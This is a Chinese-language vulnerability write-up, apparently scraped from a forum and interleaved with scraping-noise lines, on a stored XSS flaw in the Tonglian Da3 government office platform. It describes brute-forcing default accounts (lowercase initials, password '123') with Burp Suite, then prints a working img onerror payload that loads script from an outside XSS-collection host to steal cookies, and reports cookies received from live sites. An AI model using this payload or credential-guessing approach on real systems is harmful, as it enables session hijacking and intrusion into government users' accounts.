. K. H% ]" I7 k2 u, [, x
2 }; b, l; O, v& ?' j3 d h5 S 同联Da3协同办公平台后台通用储存型xss漏洞/ x; {' i% D( t4 g3 ^' v$ d
7 [5 m @4 i$ u" z% h& S
V! h6 B- e/ s# P 平台简介:
! _$ J( G. C5 F4 E
C0 z3 X5 |/ G
" G# U$ W* q( \, g* T
& G( |1 F$ c0 S: \4 `
3 F( b" G9 b* i $ H( n6 r& |' h) L2 ~5 Z4 f
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( e5 U$ ?, D$ U) W3 q( d
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 O+ `% ^- ?' ~# e
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
% |% m+ V* z( ?* E x) A# a
& |6 Z5 h+ A' u9 C/ ]8 _* x( s
) i u4 ~3 R4 p" b- ^
2 j5 i/ G6 P. V h/ B2 f
: j$ S- V; a/ C! z) H
3 l. m0 [- U& U 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
) v* L' c- K, l7 B! S; K+ {9 U
7 ?; y4 `' c+ C" X, _: E
( \, e+ X, u, N+ c
; k' h3 J: p8 l6 [* G3 T3 C
, Z; c9 p3 c* N/ q( U; _ ' `! R i1 `3 y& K ~ X6 e
http://1.1.1.1:7197/cap-aco/#(案例2-)% \* {& E* U8 {6 @" Q
0 Y% R N5 M8 q9 j! T9 t+ h* F# t
' p+ X/ x" @/ v# w7 M' o9 |0 }! s
http://www.XXOO.com (案例1-官网网站)) C" J1 |' C- U- j+ W1 |' ^* K. ~
3 H) w- X1 t( e
( c2 S, L) u* g* K: J7 r# _ 漏洞详情:
6 E) w0 ?, w- _: d) J! h5 ^. @
7 c6 {/ o; U5 _7 A6 F
" a* f& l4 Q' H
案例一、
" x$ t- o4 @% A7 C$ [2 \
5 D* @* S% W2 g2 h3 N' | 0 w; {9 i! p# o* S2 o
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试$ q( g# y% z0 X3 n, h
/ {& ^* D4 Z% L9 y 0 J3 }& i5 v/ j2 c$ U
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
" k$ s: h3 S; R' b2 U2 N" Y/ T
5 u' S$ W8 T" I r( J6 N$ B5 N
' j, a6 S3 r: [/ P
! j P) m1 B0 E! }7 S' I' I4 @7 B
) A H9 d; w8 L6 R" w
7 o4 {, x5 U& G& t- ]' A
* i3 U. Y# a& O6 C2 j" ^) U
+ t- f# m5 `& k0 ^4 j! s% k
: ~: c* ]1 _8 N8 S" I0 D
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
) l( g$ w. J) L" q0 d9 }4 K
' D) I; F8 M) h , E9 u+ |& Z3 X/ h, Y
0 {8 c& ?) r/ L+ X+ w
9 [, e) X. E# M; t
9 u; V8 [6 \" P2 e* K6 v
" T& s" T, L- X# c I) o' U
u" y' r# \! ^& Q' |/ J, `' y
, g( k# C% d9 w* ]
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ; [" O% _; {% B4 r( k
/ {2 o# l3 s1 K$ R3 k, j, r0 G/ p
- P2 H( }2 d9 Y1 o
+ [1 J1 o/ ]* n; v: q! N x9 A
* E0 H# D, g8 y9 \
& J$ v, R3 f: q$ ]6 B <img src=x
/ u& F5 G% M% n: \onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
9 Z5 i9 y. g! B* [7 Y! _4 g
6 }3 L% p/ L7 Y3 d0 k
; G0 p; @0 n- {
" P5 p1 P2 [* T) B# e( S6 D
% X2 ?( M& Y/ \) y$ ^
% C& i3 n; O# Z; X! u 然后发送,接收cookie如图:
& k! \8 j2 K( i' b2 Y+ ]
2 K* X# E+ M4 i/ h' }' l7 L
0 p5 j0 X# C' I1 g4 \3 Y
, g0 h7 p" A1 r6 B4 s: Q: R
7 H% ~- ^' Q4 p$ _" h4 p+ ? & `, I" v( k( H; `9 {+ c+ g; i) \) h# `! z
1 U. e3 Z1 i% j( M+ d5 h2 }) C8 K
s& _: l5 e8 ?& P; s( k
6 R& s$ |. r. Z# B \
$ e R2 o# O; |+ S9 F: }' K
! g# U2 z# S3 Y 4 Y9 Y5 Z& Z! S0 ?! t, u
% u* `' ^, N- D8 Q5 o
: _( x# M2 n, ?7 V4 r2 `' V
7 B) f$ w8 N6 U# Q# y
6 F) L5 C( B9 P
f; I* S, s* t" S
: I/ K9 t5 ?! ?: P
8 Z0 }4 t& @4 ]2 F6 X' Z3 Q
1 y* R: s$ z1 C6 i# J. ^: [7 [' k7 M * v4 U) C; ]4 S9 f# k- K+ H
$ S' j6 U3 B, o' d0 p8 r
. F2 Z; l/ D8 V- R( f! i
$ U0 A3 w* Y! h- } a3 T 案例2、
7 \8 i/ {+ v& _1 m
# e. E- X$ A" p# u ' t. c4 a$ o& v9 h |4 R
前面步骤都一样,下面看效果图:
8 T# ^& Y5 g) A% U3 `6 @. ~+ j9 M! k
$ q |& ?0 g; j
! p% q( N/ z) F( W4 b! H0 F
7 q+ C E* L% x$ V0 f
/ d! W$ F7 I/ `9 R 0 L" {& C i v5 l, Z! T
6 ~; {1 L1 H C$ P
0 x5 l2 Y& l6 @6 J, F( k' F0 X# k7 \
* J; s2 o' r( J4 T
& N' _: @' a+ D. {/ U
# p" b8 C+ @/ h" F, b
6 _0 S0 _4 L( b S1 _
0 c! V. U! g5 B* O
8 k; O, g& `' ^4 h
; e+ {# z0 b- q, p
7 H, @# p1 U* j( @) u
/ J, |" G$ i. } J) U
- V9 ~7 P# h( d6 K# ~+ e
4 x4 ]2 j, N& a
6 B& i# Q9 W" G7 Z/ {" W7 r3 o
8 I1 \" P5 X& k+ F* Y4 [1 w
% \7 y# Q; D' D' K! {( |
7 b: c0 B: N, x
: ?' Z0 e7 A" l8 w4 o6 y4 k
, m% u( F9 r& `) W: F
5 h8 R6 L! X/ v1 w5 B3 k
# c# W' b' d$ b J2 |1 W5 y # X% ? t n2 U5 \5 p6 Z# |
) I# X& b$ } |" S; G, k7 r( s